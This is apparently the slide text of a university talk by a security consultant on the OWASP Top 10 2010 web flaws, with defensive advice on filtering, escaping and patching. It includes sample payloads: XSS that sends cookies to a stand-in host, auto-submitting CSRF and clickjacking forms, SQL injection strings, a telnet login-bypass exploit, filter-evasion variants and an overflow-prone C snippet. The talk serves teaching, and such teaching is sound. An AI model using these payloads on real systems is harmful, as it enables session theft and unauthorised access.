Presentation for the Devnology Community Back to School program at the Radboud University Nijmegen

1. The top 10 security issues
in web applications
ir. Walter Belgers, CISSP, CISA

2. Walter Belgers
• Principal Security Consultant and
Partner at Madison Gurkha B.V.
• Close to 20 years of professional experience
in technical IT security

3. • Madison Gurkha supports organisations with high
quality services to efficiently identify, decrease and
prevent IT security risks
• With a focus on technical security aspects

6. • Non-profit organisation
• 70 local chapters
• Develop several tools (a.o. WebScarab, LiveCD)
• Spread knowledge (Webgoat, documentation)
• Methodology (testing) / legal / ...
• OWASP TOP-10

7. OWASP TOP-10 2010
A1 - Injection A6 - Security Misconfiguration
A2 - Cross Site Scripting A7 - Insecure Cryptographic
(XSS) Storage
A3 - Broken Authentication A8 - Failure to Restrict URL
and Session Management Access
A4 - Insecure Direct Object A9 - Insufficient Transport
References Layer Security
A5 - Cross Site Request A10 - Unvalidated Redirects
Forgery (CSRF) and Forwards

8. A10 - Redirects
• The site sends you to a URL that can be
manipulated
• That in turn can be encoded in a normal looking
URL
• Phishing attack

10. A9 - TLS
• HTTP versus HTTPS
• Protocol: SSLv2, SSLv3, TLSv1
• Crypto-algorithm: several
• Certificates
• Marking session cookies as ‘secure’

11. A9 - TLS
• The purpose of SSL
• Actually only useful for untrusted
(WiFi-)networks
• Do you pay attention all of the time?
• VPN
• Firefox (Chrome) plugin: perspectives

13. A8 - Restricting URL’s
• Page can be retrieved without authentication
• Programming error
• Page can only be retrieved if you know the “secret
URL”
• “Security through obscurity”

14. <script language="javascript">
<!--//
/*This Script allows people to enter by using a form that asks for a
UserID and Password*/
function pasuser(form) {
if (form.id.value=="buyers") {
if (form.pass.value=="gov1996") {
location="http://officers.federalsuppliers.com/agents.html"
} else {
alert("Invalid Password")
}
} else { alert("Invalid UserID")
}
}
//-->
</script>

15. Real-life example
if (Pressed=”Update”) {
if (top.content.Rights==”user”) {
alert(“You are not authorized!”);
return(-1);
}
...
}

16. A7 - Crypt. Storage
• Data in a database should (maybe partially) be
encrypted/hashed
• Passwords, credit card data, ..
• Of importance when data leaks out

17. A6 - Misconfiguration
• Missing security patches
• Default users / programs
• Directory listings
• File access (uploads, .inc files)
• Elaborate error messages

20. Exploits
[~] walter> telnet -l '-fbin' 194.151.35.251
Trying 194.151.35.251...
Connected to blade.madison-gurkha.com.
Escape character is '^]'.
Last login: Tue Sep 25 09:52:33 from 194.151.35.85
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$

22. - Nikto v2.1.3/2.1.4
+ Target Host: www.<host>.nl
+ Target Port: 80
+ GET /0WAEdrRg.php: Retrieved x-powered-by header: ASP.NET
+ GET /0WAEdrRg.axd: Retrieved x-aspnet-version header: 2.0.50727
+ GET /robots.txt: robots.txt contains 36 entries which should be
manually viewed.
+ HEAD /: Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0
for Win2k, current is at least 7.5)
+ GET /: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /webmail/blank.html: /webmail/blank.html: IlohaMail 0.8.10
contains an XSS vulnerability. Previous versions contain other
non-descript vulnerabilities.
+ GET /webmail/: /webmail/: Web based mail package installed.
+ OSVDB-3093: GET /webmail/lib/
emailreader_execute_on_each_page.inc.php: /webmail/lib/
emailreader_execute_on_each_page.inc.php: This might be
interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /webmail/src/read_body.php: /webmail/src/
read_body.php: This might be interesting... has been seen in web
logs from an unknown scanner.
+ OSVDB-3092: GET /er/: /er/: This might be interesting... potential
country code (Eritrea)

23. Configuration files
• Old files (x.bak, x.old, x~, Copy of x)
• Google cache, Way Back machine
• .htaccess files
• /robots.txt
• Source revision control files
• Include files
• PHP files not ending in .php

27. A5 - CSRF
• Cross Site
• The attack page is on the site of the attacker
• Must be visited (e-mail?)
• Request Forgery
• Often a POST-request with specially
constructed values
• You have to be logged in to the target site

28. CSRF in a CMS
<form name=“csrf” action="http://cms.example.com/?page=/
&action=admin&subaction=editgroups&groupname=admin" method="post"
<input type="hidden" name="txtUserEmail" value="myemail@example.com">
<input type="hidden" name="btnAddUserToGroup" value="Add User to Group">
</form>
<script>
document.csrf.submit();
</script>

29. Clickjacking
<iframe style="width: 0px; height: 0px; visibility: hidden"
name="hidden"></iframe>
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box"
method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE
%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE
%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<script>document.csrf.submit();</script>

30. A4 - Insecure References
https://example.com/servlet/page?_pageid=44
http://example.com/showaccount.php?user=3

31. A4 - Insecure References
<form action=“housessince.cgi”>
<select name=“since”>
<option value=“00”>today</option>
<option value=“01”>yesterday</option>
<option value=“07”>last week</option>
</select>
<input type=“submit”>
</form>

32. A3 - Broken Session Mgmt
• Is there a session timeout?
• How many simultaneous logins are allowed?
• Can you change systems within a session (different
IP number)
• Is there a logout button?
• Are credentials sent using a secure connection?
(A9)
• How often can you try logging in per user?

33. A3 - Broken Session Mgmt
• Do you get to know what was wrong when
logging in fails?
• Does the server (also) invalidate the session
cookie when logging out?
• Does the URL contain session id’s?
https://example.com/prepaid/customer/
login.html;jsessionid=F0382A6E8172DC7B8D90599B12AECE16
• Session fixation problems

34. A2 - XSS
• Cross Site
• The victim’s browser redirects from the
vulnerable site to the attacker’s site
• Scripting
• This happens by executing JavaScript in the
victim’s browser
• Goal: stealing session credentials (cookies)

35. Stored XSS
• The attacker can leave behind input that is being
shown to (other) visitors of the site
• Profile information
• Messages
• ...

36. Stored XSS
Your message:
This is my message.
<script>document.location=‘http://
example.com/’+document.cookie</script>

37. Reflected XSS
<a href=“http://example.com/comment.aspx?
text=This is my message.
<script>document.location=‘http://
example.com/’+document.cookie</script>”>This is
awesome!! Click here!</a>

38. Reflected XSS
<a href=“http%3A//example.com/comment.aspx
%3Ftext%3DThis%20is%20my%20message.%20%3Cscript
%3Edocument.location%3D%E2%80%98http%3A//
example.com/%E2%80%99+document.cookie%3C/script
%3E”>This is awesome!! Click here!</a>

39. Reflected XSS
<img src=“http%3A//example.com/comment.aspx
%3Ftext%3DThis%20is%20my%20message.%20%3Cscript
%3Edocument.location%3D%E2%80%98http%3A//
example.com/%E2%80%99+document.cookie%3C/script
%3E” />

40. A1 - Injection
• Problem: data gets mingled with “program code”
• PHP, Perl, ..
• But also: SQL, LDAP, ..

41. Old problem
• In-band signalling
• Well-known from
telephony
• Hot again! foto: woz.org

42. Typical setup
Internet
Inernet
HTTP
www
SQL
Internal
Intern
Internal
network
netwerk
network db

43. SQL injection
Your name please: walter
Name: Balance:
walter €100
SELECT * FROM users WHERE name=“$name”
SELECT * FROM users WHERE name=“walter”

44. SQL injection
Your name please: ” OR “a”== “a
Name: Balance:
walter €100
guido €1000
hans €2000
SELECT * FROM users WHERE name=“$name”
SELECT * FROM users WHERE name=“” OR “a”==“a”

45. Real-Life Example
• Bank site
• With a search function
• We enter as search string:
<script>alert(‘test’)</script>
• This running Macro ‘odbc’: Error in line 2: Incorrent syntax near
Error
yields:
‘test’. (SELECT nr, subject FROM pagedb WHERE (subject LIKE
‘%<script>alert(‘test’)</script>’ order by subject) (source:
Microsoft OLE DB Provider for SQL Server)

46. SQL injection
• Input frut’) or 1=1-- yields all pages
• Input frut’) union select 0, @@version from
pagedb-- yields information about the type of
software being used
• Input frut’) union select dbid, name from
master..sysdatabases-- yields a list of databases

47. Injection
• Input fields
• Are sometimes/often “secured” with JavaScript-
code
• That code runs in the browser
• If the user allows it to..

48. Injection
• In addition to input fields:
• URL’s (GET requests)
• Hidden fields (POST requests)
• Cookies
• Other data in the HTTP-headers (e.g. referer)

49. Local proxy
Internet
Inernet
HTTP
www
SQL
Internal
Intern
Internal
network
netwerk
network db

50. WebScarab, Burp, Paros

52. Demo

54. Configuration
• Installation ≠ configuration
• Remove example scripts
• Set passwords where possible
• Remove unnecessary files
• (Hardening)
• A6, A9

55. Software

56. Patching
✓OS and some applications: automatic
x For a lot of additional software: not automatic

57. Patching
x For in-house developed software: ???
• Security audits

58. Input filtering
• Helps prevent A1, A2, A4, A8 and A10!
• Check all input before storing, processing or
showing it
• Data in URL’s, forms, cookies, HTTP-headers,
etc.

60. Input filtering
• White-list filtering: only allow certain characters
• Black-list filtering: remove ‘dangerous’ characters

61. Black list filtering
• <SCRIPT>
<script> • <␣script>
• %3Cscript>
• “<sc”+“ript”>
• <b onmouseover=“...”>

62. Escaping of output
• Rewriting ‘dangerous characters’
• For example &lt; instead of <
• The rewriting depends on where it must be done!

63. Escaping of output
• In the template: <p>%(foo)</p>
• We request: http://example.com/?
foo=<script>alert(document.cookie)</script>
• We get: <p><script>alert(document.cookie)</
script></p>
• Escaping: rewriting < > into &lt; &gt;

64. Escaping of output
• In the template: <input name=“foo” value=“%
(foo)” />
• We request: http://example.com/?
foo=”%20onmouseover=“alert(document.cookie)
• We get: <input name=“foo” value=“”
onmouseover=“alert(document.cookie)” />
• Escaping: rewriting “ into &quot;

65. Escaping of output
• In the template: <script>var foo=‘%(foo)’, bar=‘%
(bar)’;</script>
• We request: http://example.com/?foo=
&bar=;alert(document.cookie);//
• We get: <script>var foo=‘’,
bar=’;alert(document.cookie);//

66. Secure programming
• Can fix
A3, A4
A5, A7

67. Secure programming
• Not many programmers have a background in
‘secure programmin’
main(int argc, char* argv[]) {
char *buf[2000];
int len;
len = atoi(argv[1]);
if (len > 2000) {
printf("Too much input!n");
exit(-1);
}
memcpy(buf, argv[2], len);
}

68. Tips and tricks
• A2: use the ‘HttpOnly’ option for session cookies
• A3: generate a new session
cookie on the login page
• A5: use a nonce
• Sometimes, a framework can help

69. What to do? (1)
• Learn programmers how to write secure code
• Create a security specification next to the
functional specification
• Also when the application is
bought from a supplier
• Abuse cases
• Auditing

70. What to do? (2)
• If All Else Fails... (and it will)
• Multiple layers of defense
(prevention)
• Logging and monitoring (detection)
• Emergency plan (reaction)

71. Web application security
• There are no fantastic
automated tools
• With a good brain and tools
like Burp Suite, every
web application can be
tested well

72. walter@madison-gurkha.com